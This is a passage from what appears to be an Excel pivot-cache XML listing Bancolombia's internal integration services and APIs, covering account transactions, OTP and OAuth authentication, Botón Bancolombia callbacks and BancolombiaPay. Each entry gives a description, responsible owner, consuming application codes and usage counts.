    <s v="Captaciones"/>
    <m/>
    <m/>
    <m/>
    <s v="AW1170"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Afectacion Monetaria Depositos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v=" El servicio requerido en el Broker es una virtualización de servicios que se van a exponer en Bankvision, relacionados con la transaccionalidad de Cuentas de Ahorro/Corrientes:_x005f_x000D_ _x005f_x000D_ - acreditarCuenta_x005f_x000D_ - debitarCuenta_x005f_x000D_ - anularCredito_x005f_x000D_ - anularDebito_x005f_x000D_ - transferirFondosEntreCuentas_x005f_x000D_ - anularTransferenciaFondosEntreCuentas_x005f_x000D_ "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor Transversal"/>
    <s v="Depósitos"/>
    <s v="Leidy Yurany Guarin Lopez"/>
    <m/>
    <s v="CUENTAS AFC_AW1110001"/>
    <s v="AW01065 _x000d__x000a_APIC _x000d__x000a_NU0017001 _x000d__x000a_AW0638 _x000d__x000a_AW1269001 _x000d__x000a_AW1170 _x000d__x000a_AFC _x000d__x000a_NU0004001 _x000d__x000a_AW1078001 _x000d__x000a_AW1300001 _x000d__x000a_AW1311 _x000d__x000a_AW1365 _x000d__x000a_AW1298001 _x000d__x000a_AW1011 _x000d__x000a_AW0638001 _x000d__x000a_AW1110001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Afectaciones Monetarias Tarjetas Credito"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Afectaciones Monetarias Tarjetas Crédito permite realizar, como su nombre lo indica, diferentes afectaciones monetarias sobre una tarjeta de crédito. Tales afectaciones incluyen:  • Pagar tarjeta de crédito con débito a cuenta • Pagar tarjeta de crédito de terceros • Pagar tarjeta de crédito con cuentas de otros bancos"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Digital Medios de Pago"/>
    <s v="Julian David Arboleda Velez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_AW1405001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Almacenar Solicitud De Credito_BB11"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite a los consumidores enviar a Gestión Documental información relacionada con el cliente que hace la solicitud de un crédito de consumo."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="BB11_Generación de Solicitudes_RequestGeneration_AW0935001"/>
    <s v="AW0499 _x000d__x000a_AW1176 _x000d__x000a_AW0922 _x000d__x000a_AW0856"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Anulacion Factura Recaudo"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio Anulación Factura Recaudo permitirá a los recaudadores hacer gestión sobre sus facturas _x000a__x000a_ "/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
    <s v="PRODUCTORCONSUMIDOR _x000d__x000a_NU0084001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Arquear Documentos"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Permite realizar el arqueo (custodia) de Documentos en Gestión Documental, posterior al consumo del servicio BB7 correspondiente al Envío y Recepción de documentos."/>
    <s v="APOYO_AL_NEGOCIO"/>
    <s v="Facilitadores Digitales"/>
    <s v="Evolución Digital"/>
    <s v="Productor"/>
    <s v="Evolución Digital"/>
    <s v="Cristian Camilo Villada Giraldo"/>
    <m/>
    <s v="Oracle ECM_UCM - Universal Content Management_AW0494001"/>
    <s v="AW0682001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Asignar Primera Segunda Clave SVP"/>
    <n v="300"/>
    <s v="No Aplica"/>
    <s v="Permitir que un cliente de Filiales del Exterior genere su primera o segunda clave única de cliente en la (SVP) Sucursal Virtual Personas para Filiales del Exterior."/>
    <s v="FILIALES_DEL_EXTERIOR_Y_ALIADOS"/>
    <s v="Filiales del Exterior"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <s v="Filiales del Exterior"/>
    <m/>
    <m/>
    <s v="IAM"/>
    <s v="AW0718001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticacion Cliente"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio habilita la autenticación de clientes Bancolombia del segmento personas que tengan un nombre de usuario registrado para cualquiera de los canales."/>
    <m/>
    <m/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="FUA-Front Unico de Autenticación_AW1291001, Servicio genérico de autenticación _AW1160001"/>
    <s v="AW1128 _x000d__x000a_NU0051001 _x000d__x000a_AW1291001 _x000d__x000a_DEVELOPSOATEST"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticacion Cliente DIAN"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio está orientada a la habilitación de la interoperabilidad con los sistemas Muisca de la DIAN. Describe los mecanismos y requerimientos para que un sistema externo (aplicación) pueda obtener un token de acceso para el consumo de servicios de la entidad."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos o Gobierno e Impuestos"/>
    <m/>
    <m/>
    <s v="DIAN"/>
    <s v="AW01065"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticacion Oauth"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El Componente de Integración Autenticación Oauth, comprende la especificación de implementación requerida para el procesamiento de los consumos realizados por parte del servicio de Oauth 2.0, con el objetivo de realizar el proceso de autenticación de los clientes que hacen uso de las APIs expuestas por el Banco a través de API Connect.  Este componente hace uso de la capacidad entregada en el iSeries encargado de realizar la generación / validación de PINES. Dicha Capacidad se encuentra virtual izada en Broker. Una vez validado el OTP se recupera información básica del cliente como el Nombre y Apellido relacionados al OTP."/>
    <m/>
    <m/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="Giros Nacionales_AW1227001"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticacion Sufi"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio AutenticacionSufi permitirá a los consumidores autenticar a un usuario registrado en sufi."/>
    <s v="SUFI"/>
    <s v="Sufi"/>
    <s v="SUFI"/>
    <s v="Productor"/>
    <s v="Sufi"/>
    <s v="Leidy Johanna Moreno Pelaez"/>
    <m/>
    <s v="Servicio Web Cliente Sufi_AW1083001"/>
    <s v="AW1209001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Cliente OTP"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Colombia. Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="APIC _x000d__x000a_AW1177 _x000d__x000a_AW0937 _x000d__x000a_AW0748001 _x000d__x000a_AW1170 _x000d__x000a_AW1287001 _x000d__x000a_NU0101001 _x000d__x000a_NU0004001 _x000d__x000a_AW1287 _x000d__x000a_AW1128 _x000d__x000a_AW1011 _x000d__x000a_AW1185001 _x000d__x000a_NU0100001 _x000d__x000a_AW1316001 _x000d__x000a_AW1277001 _x000d__x000a_DEVELOPSOATEST _x000d__x000a_NU0199001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Cliente OTP"/>
    <n v="110"/>
    <s v="No Aplica"/>
    <s v="Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID. El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID_x005f_x000D_ "/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="AW0638"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Cliente OTP"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Para la autenticación fuerte en los canales virtuales se utiliza OTP (One Time Password), esta es una tecnología que provee una contraseña de una sola vida, la cual es provista por un producto llamado Detect ID.  El servicio AutenticarClienteOTP permite la validación de un OTP generado a un cliente desde la plataforma de clave dinámica Detect ID"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <s v="Cyxtera"/>
    <s v="NU0100001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Compra VCAS"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="El servicio se encargara de realizar la autenticación para la compra en comercios seguros directamente con Cardinal. identificando al cliente, y usando el segundo factor de autenticación según convenga_x000a_"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Autorizaciones"/>
    <s v="Daniel Esteban Ramirez Correa"/>
    <m/>
    <m/>
    <s v="NU0101001"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Usuario"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Este servicio se encarga de autenticar usuarios por medio de su documento de identificación y su PIN (primera clave), actualmente es utilizado por Ventas por Internet (Todo1)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Jornadas"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="VENTAS POR INTERNET_SECURITY SESSION MANAGER (SSM)_AW1013001"/>
    <s v="No tiene"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Autenticar Usuario"/>
    <n v="200"/>
    <s v="No Aplica"/>
    <s v="Este servicio se encarga de autenticar usuarios por medio de su documento de identificación y su PIN (primera clave), actualmente es utilizado por Ventas por Internet (Todo1)."/>
    <s v="PRODUCTOS_DE_FINANCIACION"/>
    <s v="Jornadas"/>
    <s v="Financiación y consumo"/>
    <s v="Productor"/>
    <m/>
    <m/>
    <m/>
    <s v="VENTAS POR INTERNET_SECURITY SESSION MANAGER (SSM)_AW1013001"/>
    <s v="AW1177 _x000d__x000a_AW1170 _x000d__x000a_AW1128"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-07-25T15:10:35"/>
    <s v="Authorization"/>
    <n v="111"/>
    <s v="Authorization - Access Authorization"/>
    <n v="110"/>
    <s v="authorization-access-authorization"/>
    <s v="API que permite obtener el token de autorización para el consumo de APIs píºblicas y partner aseguradas con OAuth2.0"/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Autenticación y Monitoreo"/>
    <s v="Productor"/>
    <s v="Gestión de Identidades"/>
    <s v="Mariluz Velasquez Suarez"/>
    <m/>
    <m/>
    <s v="pruebaBancolmbiaButton _x000d__x000a_ PruebasIntegración _x000d__x000a_ APP D Y S _x000d__x000a_ FACTURE PAY _x000d__x000a_ ALCALDIA DE MANIZALES _x000d__x000a_ TRANSFIRIENDO _x000d__x000a_ BANCOLOMBIAPAY APP _x000d__x000a_ Moneygram_MNR _x000d__x000a_ Botón _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <n v="10"/>
    <m/>
    <n v="13"/>
    <x v="4"/>
  </r>
  <r>
    <x v="0"/>
    <m/>
    <s v="No Aplica"/>
    <s v="No Aplica"/>
    <s v="Authorization Services"/>
    <n v="100"/>
    <s v="No Aplica"/>
    <s v="Componente encargado de la autenticación de los clientes, haciendo uso de flujo OAuth Resource Owner Password Credentials, también permite el enrolamiento y autenticación con factor biométrico local. Para todos los casos se genera un token de acceso con el cual se controla la sesión del canal y la autorización en Security Filters a los recursos. Adicionalmente se expone la capacidad de validación de token de acceso vía instrospección."/>
    <s v="ECOSISTEMAS_DE_RIESGOS_SEGURIDAD_Y_APOYO_TI"/>
    <s v="Seguridad"/>
    <s v="Galatea"/>
    <s v="Productor Transversal"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <s v="ALM"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="0"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-04-28T03:51:33"/>
    <s v="Bancolombia Button"/>
    <n v="102"/>
    <s v="Bancolombia Button - Transference Management"/>
    <n v="102"/>
    <s v="bancolombia-button-transference-management"/>
    <s v="Este servicio permite que un comercio pueda registrar una intención de compra, para pagar a través de Botón Bancolombia, obteniendo como resultado un identificador de dicha intención. Después de registrar la intención de compra, el comercio podrá consultar el estado de la transferencia con el identificador que se retornó en el primer momento. "/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="Boton de Transferencias_AW1277001"/>
    <s v="WOMPI _x000d__x000a_ BC_Herramientas_MonitoreoPrd"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <m/>
    <x v="5"/>
  </r>
  <r>
    <x v="2"/>
    <d v="2021-04-28T14:26:14"/>
    <s v="Bancolombia Button"/>
    <n v="202"/>
    <s v="Bancolombia Button - Transference Management"/>
    <n v="202"/>
    <s v="bancolombia-button-transference-management"/>
    <s v="Capacidades funcionales que tienen como objetivo apoyar un nuevo medio de pago virtual denominado Botón de Transferencias Bancolombia"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Servicios Transaccionales MP"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <s v="Por Definir"/>
    <m/>
    <s v="Boton de Transferencias_AW1277001"/>
    <s v="TIGOUNE _x000d__x000a_ Tuya _x000d__x000a_ Tigo une prueba APP _x000d__x000a_ VIRGINMOBILEAPP _x000d__x000a_ Baguer SAS _x000d__x000a_ SERVICIOS DE SALUD IPS SURAMERICANA S.A.S. _x000d__x000a_ OPERACIONES GENERALES SURAMERICANA SAS _x000d__x000a_ SERVICIOS GENERALES SURAMERICANA S.A.S. _x000d__x000a_ CONSULTORIA EN GESTION DE RIESGOS SURAMERICANA _x000d__x000a_ SEGUROS GENERALES SURAMERICANA SA _x000d__x000a_ SEGUROS DE VIDA SURAMERICANA SA _x000d__x000a_ EPS SURAMERICANA S.A. _x000d__x000a_ FONYOU COLOMBIA SAS _x000d__x000a_ INVERSORA EBCO APP _x000d__x000a_ ABC PAGOS _x000d__x000a_ LYRAAPP _x000d__x000a_ CLAROAPP _x000d__x000a_ SUPERPAGOSAPP _x000d__x000a_ ZONA PAGOS _x000d__x000a_ Place to Pay _x000d__x000a_ T atiendo Boton Bancolombia _x000d__x000a_ Boton Bancolombia _x000d__x000a_ E-collect _x000d__x000a_ App_Blendex_BotonBancolombia _x000d__x000a_ ofrendaappbc _x000d__x000a_ ALKOSTO BOTON BANCOLOMBIA _x000d__x000a_ WOMPI APP _x000d__x000a_ BC_Herramientas_MonitoreoPrd _x000d__x000a_ COMFAMA APP _x000d__x000a_ SISTECREDITO SAS _x000d__x000a_ PAYMENTEZ APP _x000d__x000a_ FONVALMED"/>
    <n v="939414"/>
    <n v="768053"/>
    <n v="2040383"/>
    <n v="4058637"/>
    <n v="8844910"/>
    <x v="5"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-10-22T18:05:17"/>
    <s v="Bancolombia Button"/>
    <n v="302"/>
    <s v="Bancolombia Button - Transference Management"/>
    <n v="302"/>
    <s v="bancolombia-button-transference-management"/>
    <s v="Botón Bancolombia ofrece varias funcionalidades que permiten a los comercios procesar transacciones y conocer su estado en lí­nea **Funcionalidades** - Realizar transferencias entre cuentas de ahorro y corriente Bancolombia para ventas digitales. - Hacer consultas del estado de las transacciones. **Datos de prueba** Para realizar pruebas del producto de APIs de Botón Bancolombia puede utilizar los datos que se encuentran en el siguiente archivo: [Datos de prueba](https://cocapis.s3.us-east-2.amazonaws.com/assets/imagenes+familias/BC-OBA-CP-BancolombiaButton+v1.4.4.xlsx) **Callback** Funcionalidad que nos permite notificarle al comercio o a la pasarela de pago el resultado final de la transacción. Para habilitar esta opción, es necesario enviar la URL de notificación en el campo 'confirmationURL' de la operación POST 'registry', en caso de no enviarla, no se llevará a cabo. **Importante:** Todos los campos se enví­an como **String** pero se respeta el tipo de dato que se muestra a continuación: **Campos que se enví­an en el Callback** / **Campo** / **Tipo** / **Longitud máxima** / **Descripción** / / --- / --- / --- / --- / / transferVoucher / String / 50 / Níºmero de comprobante de la transacción. / / transferAmount / Double / 15 / Monto de la transacción / / transferStateDescription / String / 225 / Descripción del resultado de la transacción / / sign / String / 128 / Firma que permitirá validar la integridad del request generado por Bancolombia / / requestDate / DateTime / 23 / Fecha en la que se registró la orden / / transferState / String / 20 / Estado de la transacción / / transferDate / Date / 20 / Fecha en la que se aprobó o rechazó la transacción. / / transferCode / String / 50 / Identificador íºnico de la transferencia / / transferReference / String / 48 / Código de referencia de la transacción para el comercio. / / commerceTransferButtonId / String / 50 / HASH que identifica el Botón Bancolombia del comercio / **Â¿Cómo generar el sign?** Para generar este valor, debe concatenar los siguientes valores: [apiKey~commerceTransferButtonId~transferCode~tranferAmount~transferState] Una vez concatenados debe cifrar utilizando el algoritmo SHA512. Por ejemplo, al concatenar los datos mencionados debe obtener algo muy similar a esto: 5Fj8eK4rlyUd252L48herdrnEO~w0mp1B0toN~\_CeoHUM7C65~200.00~rejected Y al crear el HASH de la cadena resultante, debe obtener el sign como se muestra a continuación: b6f7bc914b69824df799db0ad7c9bb26 [Bancolombia API Working Group - Website](https://developer.bancolombia.com/contact) [Send email to Bancolombia API Working Group](mailto:apigroup@bancolombia.com.co)"/>
    <s v="MEDIOS_DE_PAGO"/>
    <s v="Emisor"/>
    <s v="Medios de pago Emision"/>
    <s v="Productor"/>
    <s v="Tarjetas Crédito"/>
    <s v="Deisy Tatiana Quintero"/>
    <m/>
    <m/>
    <s v="pruebaBancolmbiaButton _x000d__x000a_ PruebasIntegración _x000d__x000a_ APP D Y S _x000d__x000a_ MonitoreoDCM_AAA _x000d__x000a_ FACTURE PAY _x000d__x000a_ ALCALDIA DE MANIZALES _x000d__x000a_ TRANSFIRIENDO _x000d__x000a_ Botón"/>
    <n v="6173"/>
    <n v="6520"/>
    <n v="2679"/>
    <n v="3226"/>
    <n v="1719"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - Customer"/>
    <n v="100"/>
    <s v="bancolombiapay-customer"/>
    <s v="Esta API cuenta con capacidades que permiten verificar la viabilidad de una persona, autenticándola mediante un token de OTP y enviarle los términos y condiciones para que este los acepte y pueda acceder a los servicios de BancolombiaPay."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Baas-Depositos como Servicio"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <n v="144"/>
    <n v="8"/>
    <n v="125"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - OTP"/>
    <n v="100"/>
    <s v="bancolombiapay-otp"/>
    <s v="Permite Validar el codigo de unico uso que se envia al cliente como segundo valor de autenticacion."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Baas-Depositos como Servicio"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="18"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - Terms"/>
    <n v="100"/>
    <s v="bancolombiapay-terms"/>
    <s v="Permite desplegar los terminos y condiciones que fueron acordados entre el aliado y Bancolombia."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Baas-Depositos como Servicio"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <n v="2"/>
    <m/>
    <n v="35"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - Wallet"/>
    <n v="100"/>
    <s v="bancolombiapay-wallet"/>
    <s v="Esta API permite gestionar la información asociada a la billetera que hace parte del servicio de BancolombiaPay."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Baas-Depositos como Servicio"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="25"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - Wallet Balance"/>
    <n v="100"/>
    <s v="bancolombiapay-wallet-balance"/>
    <s v="API que permite consultar el saldo de una cuenta."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Baas-Depositos como Servicio"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="8"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-05-03T17:26:52"/>
    <s v="BancolombiaPay"/>
    <n v="100"/>
    <s v="BancolombiaPay - Wallet Payment"/>
    <n v="100"/>
    <s v="bancolombiapay-wallet-payment"/>
    <s v="Esta API permite a los clientes realizar el pago de productos o servicios desde una canal de un tercero."/>
    <s v="DESARROLLO_DE_SERVICIOS_E_INTEGRACION"/>
    <s v="SOA y APIs"/>
    <s v="Baas-Depositos como Servicio"/>
    <s v="Productor"/>
    <s v="Bancolombia Pay"/>
    <s v="Maria Camila Zapata"/>
    <m/>
    <m/>
    <s v="BANCOLOMBIAPAY APP _x000d__x000a_ MONET COLOMBIA SAS"/>
    <m/>
    <m/>
    <m/>
    <m/>
    <n v="2"/>
    <x v="4"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-03-02T15:25:05"/>
    <s v="Bank Account"/>
    <n v="100"/>
    <s v="Bank Account - Accounts Opening"/>
    <n v="100"/>
    <s v="bank-account-accounts-opening"/>
    <s v="Permite realizar la apertura de cuentas de ahorro o corriente para clientes ya vinculados con el Banco."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <m/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <n v="50"/>
    <n v="36796"/>
    <n v="35561"/>
    <n v="27151"/>
    <n v="46125"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2022-06-10T11:11:52"/>
    <s v="Bank Account"/>
    <n v="100"/>
    <s v="Bank Account - Plan Changing"/>
    <n v="100"/>
    <s v="bank-account-plan-changing"/>
    <s v="Cambia el plan de una cuenta de ahorros, de acuerdo con la oferta comercial de planes de vigentes."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Captaciones"/>
    <s v="Depósitos y cuentas especiales"/>
    <s v="Productor"/>
    <s v="Depósitos"/>
    <s v="Lina María Giraldo Ceballos_x000a_Juan David Velasquez Velez"/>
    <s v="CambioPlanCuenta/V1.0"/>
    <m/>
    <s v="APP_PRODUCTORCONSUMIDOR _x000d__x000a_ MonitoreoDCM_NU0084001 _x000d__x000a_ APP_PRODUCTORCONSUMIDOR _x000d__x000a_ APP_PRODUCTORCONSUMIDOR"/>
    <m/>
    <m/>
    <m/>
    <n v="17"/>
    <n v="6"/>
    <x v="1"/>
  </r>
  <r>
    <x v="1"/>
    <d v="2021-09-08T11:47:01"/>
    <s v="Bill Payment"/>
    <n v="160"/>
    <s v="Bill Payment - Management"/>
    <n v="120"/>
    <s v="bill-payment-management"/>
    <s v="El API Bill Payments - Management permitirá realizar gestión sobre sus facturas, podrá consultar las facturas, inscribirlas y/o actualizarlas."/>
    <s v="PRODUCTOS_DE_CAPTACION"/>
    <s v="Pagos y Recaudos"/>
    <s v="Gestión de flujos"/>
    <s v="Productor"/>
    <s v="Recaudos"/>
    <s v="Walter Andrés Gómez"/>
    <m/>
    <m/>
